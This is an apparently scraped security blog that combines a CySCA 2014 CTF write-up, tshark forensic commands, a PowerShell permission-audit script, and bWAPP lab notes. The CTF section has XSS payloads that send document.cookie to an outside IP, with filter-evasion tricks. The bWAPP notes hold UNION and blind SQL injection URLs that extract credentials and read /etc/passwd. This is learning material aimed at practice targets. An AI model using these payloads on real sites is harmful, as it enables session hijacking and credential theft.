Taken from "Super Time Line Analysis - SANS DFIR Webcast" https://www.youtube.com/watch?v=C4jNfXZ90fw


CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page we notice when the page is first visited that the link to the "Blog" is disabled.  Somehow we need to reenable the link to get the flag.


Below is a python script to quickly pass a GET request on the index.py page.



Notice that among the cookies returned is a vip=0.  With this sort of return you can suppose that a VIP user is going to be a value other than 0.  If I modify it to be a 1 the link to the Blog becomes enabled.  With clicking on the Blog link then the flag appears.




160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments.  Checking to see if XSS is possible as a comment is inserted.  At the bottom of the textbox you can see how you can make text bold, italicized, and then to add a link.  Upon testing the addition of a link, inside the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the pages.  Tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

This above script was filtered and not posted as a comment...  Trying a different encoding. (URL encoded)

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link however the IP Address is truncated after the first octet.  Going to further encode the IP Address and change the periods to be URL encoded.

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

Tried the above and it still caught the IP Address that was encoded.  I need a way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a python script that I found to convert an IP address to a decimal encoded number.

#!/usr/bin/python

import socket, struct
print struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0]
Output: 2886755841

With the encoded IP Address I changed the comment to be as follows however I notice that we are truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However this redirects the user and does not do it blindly. (The below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)






220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.

cmd.exe Count Lines returned with netstat from the command line

I was testing the threshold of the number of connections on a web server and threw together a dos command to accomplish the minor task.  Inside the command prompt I executed:

netstat -an | find /i "<ip address>" | find /N /i "ESTABLISHED"

tshark - More than I ever wanted to know...

Recently I purchased the book, "The Practice of Network Security Monitoring" by Richard Bejtlich.  I was reading in chapter 7 of the book about the Digital Corpora project located at http://www.digitalcorpora.org.  In the chapter he presents the scenario of the "Nitroba University Harassment Scenario".  A pcap can be downloaded about how a teacher was being harassed by a student and the object of the scenario is to identify who did it and with what evidence.  The scenario and the files you need are located at the following link.

In the book they are using the scenario to explain and teach about the tool called Xplico.  However, I am going to use the scenario to identify useful tshark commands that can be used in such an investigation.

The first lead in the investigation is that of an IP Address.  "The mail header shows that the mail message originated from the IP address 140.247.62.34, which is a Nitroba student dorm room. "

IP Address: 140.247.62.34.  I am going to use tshark to isolate and save to another pcap all activity with the IP Address as the source or destination.

tshark -r nitroba.pcap -Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" -w 140_247_62_34.pcap

The above tshark command reads like this:
-r nitroba.pcap - Read the nitroba.pcap file
-Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" - Filter so the source and destination are the same
-w 140_247_62_34.pcap - Write the packets that were found to the following file

From the information that is extracted the IP Address of 192.168.15.4 is observed.  This would be a private non-routable IP Address that is used.  In the packet capture I wonder how many private non-routeable IP Addresses there are:

tshark -r nitroba.pcap -T fields -e ip.src > ip-src.txt

The above tshark command reads like this:
-T fields - Sets the output to that of fields
-e ip.src - Defines which fields to output
> ip-src.txt - Redirects the output to a text file

$ cat ip-src.txt | sort | uniq -c | sort -n | grep -e " 172\." -e " 192\.168\." -e " 10\."
      2 192.168.15.2
      3 192.168.15.7
      6 192.168.15.8
      8 10.0.1.5
     14 192.168.15.5
     16 192.168.1.5
   1486 192.168.1.254
   2154 192.168.15.1
   6818 192.168.1.64
  34554 192.168.15.4

The above command takes the output of the source IP addresses then I used sort to sort them in a list, then I used uniq to count the number of instances and then place the count in the front of the IP, then sort the frequency of usage, and grep out the private IP Address ranges.

We can tell the busiest device is 192.168.15.4.  Let's look into the devices more and try and determine what they are.  I am going to use the MAC addresses of each device to try and identify the vendor that manufactured the device.

tshark -r nitroba.pcap -T fields -e ip.src -e eth.src > ip-src-and-mac-src.txt
cat ip-src-and-mac-src.txt | sort | uniq -c | sort -rn | grep -e " 172\." -e " 192\.168\." -e " 10\."

34554
192.168.15.4
00:17:f2:e2:c0:ce
Apple
6814
192.168.1.64
00:1d:d9:2e:4f:61
Hon Hai Precision
2154
192.168.15.1
00:1d:d9:2e:4f:60
Hon Hai Precision
1161
192.168.1.254
00:1d:d9:2e:4f:60
Hon Hai Precision
325
192.168.1.254
00:1d:6b:99:98:68
Arris Group
16
192.168.1.5
00:0a:95:69:38:cc
Apple
14
192.168.15.5
00:14:d1:44:a0:f1
Trendnet
8
10.0.1.5
00:1c:b3:79:00:31
Apple
6
192.168.15.8
00:16:cb:b4:a3:f8
Apple
4
192.168.1.64
00:1f:f3:5a:77:9b
Apple
3
192.168.15.7
00:1c:b3:79:00:31
Apple
2
192.168.15.2
00:1b:63:f1:8a:6e
Apple

With adding the source ethernet address we noticed that there is a total of 12 devices that we should gather knowledge about, not just the 10 above based on the IP Addresses.  I have bolded the IP Addresses that have more than one MAC address associated with it.  I also included the manufacturer next to the MAC Address.

The MAC Address of 00:1c:b3:79:00:31 is also found to have used 2 IP Addresses. 10.0.1.5 and 192.168.15.7

192.168.1.64 is the gateway
192.168.1.254 is the DNS Server
192.168.15.1 is the inside of the gateway
192.168.15.4 is the main IP of interest
192.168.15.5 is nothing


Did not complete the scenario...

File and Folder Auditing with Powershell

http://blogs.technet.com/b/zarkatech/archive/2012/01/14/audit-file-server-permissions-using-powershell.aspx


$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem
    $StartPath = "\\myserver\share"
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," –Path "$strComputer`_myserver-share.csv"

Friday, March 11, 2016

Audit File and Folder Permissions - Powershell

################################################################################
# AUDIT FILE & FOLDER PERMISSIONS v1.1
# by Roman Zarka | Microsoft Services
################################################################################

$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem 
    $StartPath = "\\server\share"
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," –Path "$strComputer`_share.csv"

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to have returned the database and table names of the database.  I also had to experiment with the number of columns that were expected and how it was displayed.



Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns the columns of the tables that contain the word password in them so now we can formulate our query to begin extracting information.  The below query counts the records in the users table before we extract it in the event a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are 2 records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and if they are an admin of the application in the search results...

--- SQLi GET / Select - With security level set to low...

In this challenge it only returns 1 record at a time because evaluating the code it does not loop around the recordset that is returned.  This adds a small challenge, however, not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

The above query returns the 99th row of the union selected query with also loading the /etc/passwd file so we can gather the user names on the system.

SQL Injection Boolean Based

— The below method would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked

— What if we use regular expressions to determine if the letter is between a set of characters…

Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname…  It would have taken 2 or 28 depending on if you started with a-z or A-Z.






Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...